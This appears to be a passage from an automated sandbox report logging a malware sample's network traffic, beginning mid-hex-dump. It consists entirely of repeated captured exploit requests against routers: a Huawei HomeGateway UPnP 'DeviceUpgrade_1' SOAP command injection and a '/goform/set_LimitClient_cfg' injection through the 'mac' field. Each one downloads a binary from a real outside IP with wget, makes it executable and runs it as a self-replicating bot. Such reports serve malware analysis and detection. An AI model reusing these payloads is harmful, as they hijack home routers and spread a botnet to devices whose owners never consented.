70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
